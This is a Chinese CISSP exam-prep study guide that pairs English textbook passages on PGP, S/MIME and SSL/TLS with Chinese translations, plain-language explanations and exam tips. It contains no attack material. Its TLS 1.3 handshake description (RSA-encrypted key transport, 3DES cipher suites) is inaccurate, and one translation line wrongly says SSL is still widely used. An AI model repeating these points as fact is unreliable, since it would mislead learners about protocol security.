成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
学习单元 33 / PDF P459

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

complex, awkward software that in turn required manual intervention and complicated key exchange procedures. An increased emphasis on security in recent years resulted in the implementation of strong encryption technology in mainstream email packages. Next, we'll look at some of the secure email standards in widespread use today. Pretty Good Privacy Phil Zimmermann's Pretty Good Privacy (PGP) secure email system appeared on the computer security scene in 1991. It combines the CA hierarchy described earlier in this chapter with the “web of trust” concept—that is, you must become trusted by one or more PGP users to begin using the system.

You then accept their judgment regarding the validity of additional users and, by extension, trust a multilevel “web” of users descending from your initial trust judgments. PGP initially encountered a number of hurdles to widespread use. The most difficult obstruction was the U.S. government export regulations, which treated encryption technology as munitions and prohibited the distribution of strong encryption technology outside the United States. Fortunately, this restriction has since been repealed, and PGP may be freely distributed to most countries.

PGP is available in two versions: a commercial product called PGP Encryption Solutions, which is available through Broadcom's Symantec Enterprise Division, and an open source variant called OpenPGP. These products allow for the use of modern encryption algorithms, hash functions, and signature standards within the PGP framework. PGP messages are often sent in text-encoded format to facilitate compatibility with other email systems.

Here is an example of how an encrypted message appears when sent using PGP: -----BEGIN PGP MESSAGE----- hQGMAyHB9q9kWbl7AQwAmgyZoaXC2Xvo3jrVIWains3/UvUImp3YEbcEmlLK+26o TNGBSNi5jLi2A62e8TLGbPkJv5vN3JZH4F27ZvYIhqANwk2nTI1sE0bA2Rzlw6Pc XCUooGhNY/rmmWTLvWNVRdSXZj2i28fk2gi2QJlrEwYLkKJdUxzKldSLht+Bc+V2 NbvQrTzJ0LmRq9FKvZ4lz5v7Qj/f1GdKF/5HCTthUWxJMxxuSzCp46rFR6sKAQXG tHdi2IzrroyQLR23HO6KuleisGf1X2wzfWENlXMUNGNLxPi2YNvo3MaFMMw3o1dF Zj28ptpCH8eGOVIAa05ZNnCk2a6alqTf9aKH8932uCS/AcYG3xqVcRCz7qyaLqD5 NFg4GXq10KD8Jo1VP/HncOx7/39MGRDuzJqFieQzsVo0uCwVB2zJYC0SeJyMHkyD TaAxz4HMQxzm8FubreTfisXKuUfPbYAuT855kc2iBKTGo9Cz1WjhQo6mveI6hvu0 qYUaX5sGgfbD4bzCMFJj0nUBUdMni0jqHJ2XuZerEd8m0DioUOBRJybLlohtRkik Gzra/+WGE1ckQmzch5LDPdIEZphvV+5/DbhHdhxN7QMWe6ZkaADAZRgu77tkQK6c

中文直译 / 整理

复杂且笨拙的软件,这些软件需要人工干预和复杂的密钥交换流程。 近年来, 对安全性的重视程度提高,促使主流电子邮件软件中实现了强加密技术。 接下 来,我们将介绍当前广泛使用的某些安全电子邮件标准。 良好隐私 菲尔·齐默尔曼的良好隐私(PGP)安全电子邮件系统于1991年出现在计算机安 全领域。 它结合了本章前面描述的CA层次结构与“信任网”概念——即,您必 须获得一名或多名PGP用户的信任才能开始使用该系统。 随后,您将接受他们 对其他用户有效性的判断,并由此信任从您初始信任判断衍生出的多层“信任 网”用户。 PGP最初在广泛使用时遇到了诸多障碍。 最大的阻碍是美国政府的出口法规, 该法规将加密技术视为军火,并禁止将强加密技术分发到美国境外。 幸运的是, 这一限制现已废除,PGP可以自由分发至大多数国家。 PGP提供两个版本:由Broadcom的Symantec企业部门提供的商业产品PGP 加密解决方案,以及一个名为OpenPGP的开源变体。 这些产品允许在PGP框架 内使用现代加密算法、哈希函数和签名标准。 PGP 消息通常以文本编码格式发送,以方便与其他电子邮件系统兼容。

以下是 使用 PGP 发送加密消息时的示例: -----BEGIN PGP MESSAGE----- hQGMAyHB9q9kWbl7AQwAmgyZoaXC2Xvo3jrVIWains3/UvUImp3YEbcEmlLK+26o TNGBSNi5jLi2A62e8TLGbPkJv5vN3JZH4F27ZvYIhqANwk2nTI1sE0bA2Rzlw6Pc XCUooGhNY/rmmWTLvWNVRdSXZj2i28fk2gi2QJlrEwYLkKJdUxzKldSLht+Bc+V2 NbvQrTzJ0LmRq9FKvZ4lz5v7Qj/f1GdKF/5HCTthUWxJMxxuSzCp46rFR6sKAQXG tHdi2IzrroyQLR23HO6KuleisGf1X2wzfWENlXMUNGNLxPi2YNvo3MaFMMw3o1dF Zj28ptpCH8eGOVIAa05ZNnCk2a6alqTf9aKH8932uCS/AcYG3xqVcRCz7qyaLqD5 NFg4GXq10KD8Jo1VP/HncOx7/39MGRDuzJqFieQzsVo0uCwVB2zJYC0SeJyMHkyD TaAxz4HMQxzm8FubreTfisXKuUfPbYAuT855kc2iBKTGo9Cz1WjhQo6mveI6hvu0 qYUaX5sGgfbD4bzCMFJj0nUBUdMni0jqHJ2XuZerEd8m0DioUOBRJybLlohtRkik Gzra/+ WGE1ckQmzch5LDPdIEZphvV+5/DbhHdhxN7QMWe6ZkaADAZRgu77tkQK6c

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

日志要保护完整性、时间同步和访问控制。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 34 / PDF P460

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

QvrBPZdk22uS0vzdwzJzzvybspzq1HkjD+aWR9CpSZ9mukZPXew= =7NWG -----END PGP MESSAGE----- Similarly, digitally signed messages contain the text of the message followed by a PGP signature. Here is an example: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 I am enjoying studying cybersecurity.

-----BEGIN PGP SIGNATURE----- iQGzBAEBCAAdFiEE75kumjjPhsn37slI+Cb2Pddh6OYFAmAF4FMACgkQ+Cb2Pddh 6Oba4gv8D4ybEtYidHdlfDYfbF+wYAz8JZ0Mw//f41iwkBG6BO6RtKtNPV202Ngb 3Uxqjody48ndmDM4q60x3EMy+97ZXNoZL7fY5vv2viDa1so4BqevtRKYe6sfjxMg XImhPVxUknWhJUlUopQvsetBe51nqiqhpVONx/GRDXR9gdmGO89gD7XSCy0vHhEW AuoBVNBjbXqmxWdBPdrGcA9zFhdvxzmc6iI4zYe2mQxk1Nt1K6PRXNGjJLIxqchL sD7rLVYG1I7+CLGYreJH0siW0Xltbr96qT++1u4tMo1ng1UraoB21zTPVcHA0pJu DLrlXB0GFxVbDHpttOhYDPFZPk4NpzztDuAeNCA5/Oi3JJMjzBRrRuoIH7abmePX qc0Bl1/DAbbiYd5uX01i8ejIveLoeb4OZfLZH/j+bJZT5762Wx0DwkVtm8smk6nl +whpAZb5MV6SaS1xEcsRpU+w/O61OPteZ6eIHkU9pDu0yXM6IdtfRpqEw3LKVN/M zblGsAq4 =GXp+ -----END PGP SIGNATURE----- The preceding example sends the message in plaintext with a PGP signature appended to the bottom.

If you add encryption to protect the confidentiality of the message, the encryption is applied after the message is digitally signed, producing output that appears similar to any other encrypted message.

For example, here is that same digitally signed message with encryption added: -----BEGIN PGP MESSAGE----- owEBBwL4/ZANAwAIAfgm9j3XYejmAaxAYgh0ZXN0LnR4dGAF4N1JIGFtIGVuam95 aW5nIG15IHByZXBhcmF0aW9uIGZvciB0aGUgQ0lTU1AgZXhhbS4KCokBswQAAQgA HRYhBO+ZLpo4z4bJ9+7JSPgm9j3XYejmBQJgBeDdAAoJEPgm9j3XYejmLfoL/RRW oDUl+AeZGffqwnYiJH2gB+Tn+pLjnXAhdf/YV4OsWEsjqKBvItctgcQuSOFJzuO+ jNgoCAFryi6RrwJ6dTh3F50QJYyJYlgIXCbkyVlaV6hXCZWPT40Bk/pI+HX9A6l4 J272xabjFf63/HiIEUJDHg/9u8FXKVvBImV3NuMMjJEqx9RcivwvpPn6YLJJ1MWy zlUhu3sUIGDWNlArJ4SdskfY32hWAvHkgOAY8JSYmG6L6SVhvbRgv3d+rOOlutqK 4bVIO+fKMvxycnluPuwmVH99I1Ge8p1ciOMYCVg0dBEP/DeoFlQ4tvKMCPJG0w0E ZgLgKyKQpjmNU9BheGvIfzRt1dKYeMx7lGZPlu7rr1Fk0oX/yMiaePWy5NYE2O5I D6op9EcJImcMn8wmPM9YTZbmcfcumSpaG1i0EzzAT5eMXn3BoDij12JJrkCCbhYy 34u2CFR4WycGIIoFHV4RgKqu5TTuV+SCc//vgBaN20Qh9p7gRaNfOxHspto6fA== =oTCB -----END PGP MESSAGE----- As you can see, it is not possible to tell that this message is digitally signed until after it is decrypted.

QvrBPZdk22uS0vzdwzJzzvybspzq1HkjD+aWR9CpSZ9mukZPXew= =7NWG -----END PGP MESSAGE-----

中文直译 / 整理

同样,数字签名的消息包含消息文本,后接 通过PGP签名。

以下是一个示例: ‑‑‑‑‑BEGIN PGP SIGNED MESSAGE‑‑‑‑‑ Hash: SHA256 I am en joying studying cybersecurity. ‑‑‑‑‑BEGIN PGP SIGNATURE‑‑‑‑‑ iQGzBAEBCAAdFiEE75kumjjPhsn37slI+Cb2Pddh6OYFAmAF4FMACgkQ+Cb2Pddh 6Oba4gv8D4ybEtYidHdlfDYfbF+wYAz8JZ0Mw//f41iwkBG6BO6RtKtNPV202Ngb 3Uxqjody48ndmDM4q60x3EMy+97ZXNoZL7fY5vv2viDa1so4BqevtRKYe6sfjxMg XImhPVxUknWhJUlUopQvsetBe51nqiqhpVONx/GRDXR9gdmGO89gD7XSCy0vHhEW AuoBVNBjbXqmxWdBPdrGcA9zFhdvxzmc6iI4zYe2mQxk1Nt1K6PRXNGjJLIxqchL sD7rLVYG1I7+ CLGYreJH0siW0Xltbr96qT++1u4tMo1ng1UraoB21zTPVcHA0pJu DLrlXB0GFxVbDHpttOhYDPFZPk4NpzztDuAeNCA5/Oi3JJMjzBRrRuoIH7abmePX qc0Bl1/DAbbiYd5uX01i8ejIveLoeb4OZfLZH/j+bJZT5762Wx0DwkVtm8smk6nl+ whpAZb5MV6SaS1xEcsRpU+w/O61OPteZ6eIHkU9pDu0yXM6IdtfRpqEw3LKVN/M zblGsAq4=GXp+ -----END PGP SIGNATURE----- 前面的示例以明文形式发送消息,并在底部附加了PGP签名。

如果您添加加密 以保护消息的机密性,则加密会在消息数字签名之后进行,生成的输出看起来 与任何其他加密消息相似。

例如,以下是添加了加密的相同数字签名消息: ‑‑‑‑‑BEGIN PGP MESSAGE‑‑‑‑‑ owEBBwL4/ZANAwAIAfgm9j3XYejmAaxAYgh0ZXN0LnR4dGAF4N1JIGFtIGVuam95 aW5nIG15IHByZXBhcmF0aW9uIGZvciB0aGUgQ0lTU1AgZXhhbS4KCokBswQAAQgA HRYhBO+ ZLpo4z4bJ9+7JSPgm9j3XYejmBQJgBeDdAAoJEPgm9j3XYejmLfoL/RRW oDUl+AeZGffqwnYiJH2gB+ Tn+pLjnXAhdf/YV4OsWEsjqKBvItctgcQuSOFJzuO+ jNgoCAFryi6RrwJ6dTh3F50QJYyJYlgIXCbkyVlaV6hXCZWPT40Bk/pI+HX9A6l4 J272xabjFf63/HiIEUJDHg/9u8FXKVvBImV3NuMMjJEqx9RcivwvpPn6YLJJ1MWy zlUhu3sUIGDWNlArJ4SdskfY32hWAvHkgOAY8JSYmG6L6SVhvbRgv3d+rOOlutqK 4bVIO+ fKMvxycnluPuwmVH99I1Ge8p1ciOMYCVg0dBEP/DeoFlQ4tvKMCPJG0w0E ZgLgKyKQpjmNU9BheGvIfzRt1dKYeMx7lGZPlu7rr1Fk0oX/yMiaePWy5NYE2O5I D6op9EcJImcMn8wmPM9YTZbmcfcumSpaG1i0EzzAT5eMXn3BoDij12JJrkCCbhYy 34u2CFR4WycGIIoFHV4RgKqu5TTuV+SCc//vgBaN20Qh9p7gRaNfOxHspto6fA===oTCB -----END PGP MESSAGE----- 如您所见,在解密之前,无法判断此消息是否经过数字签名。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

加密:加密把内容变成未授权者看不懂的形式。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

数字签名:数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

哈希本身不提供机密性;它主要用于完整性校验。

签名支持完整性、真实性和不可否认性,不等于加密全文。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
加密 加密把内容变成未授权者看不懂的形式。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 35 / PDF P461

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Many commercial providers also offer PGP-based email services as web-based cloud email offerings, mobile device applications, or webmail plug-ins. These services appeal to administrators and end users because they remove the complexity of configuring and maintaining encryption certificates and provide users with a managed secure email service. Some products in this category include Proton Mail, StartMail, Mailvelope, SafeGmail Chrome extension, and Hushmail. S/MIME The Secure/Multipurpose Internet Mail Extensions (S/MIME) protocol has emerged as a de facto standard for encrypted email.

S/MIME uses the RSA encryption algorithm and has received the backing of major industry players, including RSA Security. S/MIME has already been incorporated in a large number of commercial products, including these: Microsoft Outlook and Microsoft 365 Apple's iCloud Mail Google Workspace Enterprise Plus edition S/MIME relies on the use of X.509 certificates for exchanging cryptographic keys. The public keys contained in these certificates are used for digital signatures and for the exchange of symmetric keys used for longer communications sessions. Users who receive a message signed with S/MIME will be able to verify that message by using the sender's digital certificate.

Users who wish to use S/MIME for confidentiality or want to create their own digitally signed messages must obtain their own certificates. Despite strong industry support for the S/MIME standard, technical limitations have prevented its widespread adoption. Although major desktop mail applications support S/MIME email, mainstream web-based email systems do not support it out of the box (the use of browser extensions is required). Web Applications Encryption is widely used to protect web transactions.

This is mainly because of the strong movement toward ecommerce and the desire of both ecommerce vendors and consumers to securely exchange financial information (such as credit card information) over the web. We'll look at the

中文直译 / 整理

许多商业提供商还提供基于PGP的电子邮件服务,作为基于网页的云邮件服务、 移动设备应用程序或网页邮件插件。 这些服务之所以吸引管理员和最终用户, 是因为它们消除了配置和维护加密证书的复杂性,并为用户提供托管的安全电 子邮件服务。 此类产品包括Proton Mail、StartMail、Mailvelope、 SafeGmail Chrome扩展程序和Hushmail。 S/MIME 安全/多用途互联网邮件扩展(S/MIME)协议已成为加密邮件的事实标准。 S/MIME 使用 RSA 加密算法,并获得了包括 RSA 安全公司在内的重要行业厂 商的支持。 S/MIME 已被集成到大量商业产品中,包括以下产品: Microsoft Outlook 和 Microsoft 365 Apple 的 iCloud 邮件 Google Workspace 企业版 Plus S/MIME 依赖 X.509 证书来交换加密密钥。 这些证书中包含的公钥用于数字签 名以及用于较长通信会话的对称密钥交换。 收到用 S/MIME 签名的消息的用户, 可以使用发送者的数字证书验证该消息。

希望使用 S/MIME 实现机密性或创建 自己的数字签名消息的用户,必须获取自己的证书。 尽管业界对S/MIME标准有强烈支持,但技术限制阻碍了其广泛采用。 尽管主 要的桌面邮件应用程序支持S/MIME邮件,主流的基于网页的邮件系统并不原 生支持它(需要使用浏览器扩展)。 Web应用程序 加密被广泛用于保护网络交易。 这主要是因为电子商务的迅猛发展,以及电子 商务商家和消费者希望通过网络安全地交换财务信息(如信用卡信息)。 我们 将查看

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
学习单元 36 / PDF P462

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

two technologies that are responsible for the small lock icon within web browsers—Secure Sockets Layer (SSL) and Transport Layer Security (TLS). Secure Sockets Layer (SSL) SSL was originally developed by Netscape to provide client/server encryption for web traffic sent using the Hypertext Transfer Protocol Secure (HTTPS) over port 443. Over the years, security researchers discovered a number of critical flaws in the SSL protocol that render it insecure for use today. However, SSL serves as the technical foundation for its successor, Transport Layer Security (TLS), which remains widely used today.

Even though TLS has been in existence for more than a decade, many people still mistakenly call it SSL. When you hear people use the term SSL, that's a red flag that you should further investigate to ensure that they're really using the modern, secure TLS and not the outdated SSL. Transport Layer Security (TLS) TLS relies on the exchange of server digital certificates to negotiate encryption/decryption parameters between the browser and the web server. TLS's goal is to create a secure communications channel that remains open for an entire web browsing session. It depends on a combination of symmetric and asymmetric cryptography. The following steps are involved in a TLS 1.3 connection: 1.

When a user accesses a website, their browser and the web server negotiate a cipher suite that is supported by both. 2. The browser retrieves the web server's digital certificate and extracts the server's public key from it. 3. The browser creates a random symmetric key (known as the ephemeral key), uses the web server's public key to encrypt the ephemeral key, and sends the encrypted ephemeral key to the web server. 4. The web server decrypts the ephemeral key using its own private key, and the two systems exchange all future messages using the ephemeral key.

中文直译 / 整理

两种技术,它们负责在网页浏览器中显示的小锁图标——安全套接层(SSL)和 传输层安全(TLS)。 安全套接层(SSL) SSL 最初由 Netscape 开发,旨在为通过端口 443 使用超文本传输安全协议 (HTTPS)传输的网络流量提供客户端/服务器加密。 多年来,安全研究人员 发现了 SSL 协议中的多个严重缺陷,使其如今已不再安全。 然而,SSL 作为其 继任者传输层安全协议(TLS)的技术基础,至今仍被广泛使用。 尽管 TLS 已存在十余年,许多人仍错误地称其为 SSL。 当您听到人们 使用 SSL 这一术语时,这是一个警示信号,表明您应进一步调查,以确保 他们实际使用的是现代且安全的 TLS,而非过时的 SSL。 传输层安全协议(TLS) TLS 依靠服务器数字证书的交换来在浏览器和 Web 服务器之间协商加密/解密 参数。 TLS 的目标是创建一个在整个网页浏览会话期间保持开放的安全通信通 道。 它依赖于对称加密和非对称加密的结合。 TLS 1.3 连接涉及以下步骤: 1. 当用户访问网站时,其浏览器与网页服务器协商一个双方都支持的加 密套件。 2. 浏览器获取网页服务器的数字证书,并从中提取服务器的公钥。

3. 浏览器生成一个随机的对称密钥(称为临时密钥),使用网页服务器的公 钥加密该临时密钥,并将加密后的临时密钥发送给网页服务器。 4. 网页服务器使用其私钥解密临时密钥,随后两个系统使用该临时密钥交换所有 后续消息。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

对称加密:对称加密使用同一把密钥加密和解密,速度快但密钥分发难。

非对称加密:非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

公钥加密、私钥签名是核心记忆点。

证书不是密钥本身,而是身份与公钥的可信绑定。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 37 / PDF P463

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

This approach allows TLS to leverage the advanced functionality of asymmetric cryptography while encrypting and decrypting the vast majority of the data exchanged using the faster symmetric algorithm. When TLS was first proposed as a replacement for SSL, not all browsers supported the more modern approach. To ease the transition, early versions of TLS supported downgrading communications to SSL v3.0 when both parties did not support TLS. However, in 2011, TLS v1.2 dropped this backward compatibility. In 2014, an attack known as the Padding Oracle On Downgraded Legacy Encryption (POODLE) demonstrated a significant flaw in the SSL 3.0 fallback mechanism of TLS.

In an effort to remediate this vulnerability, many organizations completely dropped SSL support and now rely solely on TLS security. The original version of TLS, TLS 1.0, was simply an enhancement to the SSL 3.0 standard. TLS 1.1, developed in 2006 as an upgrade to TLS 1.0, also contains known security vulnerabilities. TLS 1.2, released in 2008, is now considered the minimum secure option. TLS 1.3, released in 2018, is secure and adds performance improvements. As of 2024, NIST requires that U.S. federal agencies support TLS 1.3 and recommends the same for all other organizations. It's important to understand that TLS is not an encryption algorithm itself.

It is a protocol within which encryption algorithms may function. Therefore, it isn't sufficient to verify that a system is using a secure version of TLS. Security professionals must also ensure that the algorithms being used with TLS are secure as well. Each system supporting TLS provides a listing of the cipher suites that it supports. These are combinations of encryption algorithms that it is willing to use together, and these lists are used by two systems to identify a secure option that both systems support. In TLS 1.3, a cipher suite consists of two components: The bulk encryption algorithm that will be used for symmetric encryption.

For example, a server might support multiple versions of AES and 3DES. The hash algorithm that will be used to create message digests. For example, a server might support different versions of the SHA algorithm.

中文直译 / 整理

这种方法使 TLS 能够利用非对称加密的高级功能,同时使用更快的对称算法 加密和解密交换的大部分数据。 当TLS首次被提出作为SSL的替代方案时,并非所有浏览器都支持这种更现代 的方法。 为了便于过渡,早期版本的TLS在双方均不支持TLS时,支持将通信 降级至SSL v3.0。 然而,2011年,TLS v1.2放弃了这种向后兼容性。 2014年,一种名为降级旧版加密填充预言(POODLE)的攻击揭示了TLS中 SSL 3.0降级机制的重大缺陷。 为修复此漏洞,许多组织完全放弃了对SSL的支 持,现在仅依赖TLS安全机制。 TLS的原始版本TLS 1.0仅仅是SSL 3.0标准的增强版。 2006年发布的TLS 1.1 作为TLS 1.0的升级版,也包含已知的安全漏洞。 2008年发布的TLS 1.2目前 被视为最低安全选项。 2018年发布的TLS 1.3是安全的,并增加了性能改进。 截至2024年,NIST要求美国联邦机构支持TLS 1.3,并建议所有其他组织也 采用相同标准。 理解TLS本身并不是一种加密算法非常重要。 它是一种协议,在该协议中加密 算法可以发挥作用。

因此,仅验证系统是否使用了安全版本的TLS是不够的。 安全专业人员还必须确保与TLS一起使用的算法本身也是安全的。 每个支持TLS的系统都会提供其支持的密码套件列表。 这些是它愿意一起使用 的加密算法组合,两个系统会利用这些列表来识别双方都支持的安全选项。 在 TLS 1.3中,一个密码套件包含两个组成部分: 将用于对称加密的批量加密算法。 例如,服务器可能支持多个版本的AES 和3DES。 用于创建消息摘要的哈希算法。 例如,服务器可能支持SHA算法的不同版本。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

密码学:密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

加密保护机密性,哈希保护完整性,数字签名支持完整性、真实性和不可否认性。

同一密钥、速度快、大数据加密常对应 symmetric。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
对称加密 对称加密使用同一把密钥加密和解密,速度快但密钥分发难。
非对称加密 非对称加密使用公钥/私钥对,便于密钥交换和签名,但速度慢。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
学习单元 38 / PDF P464

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

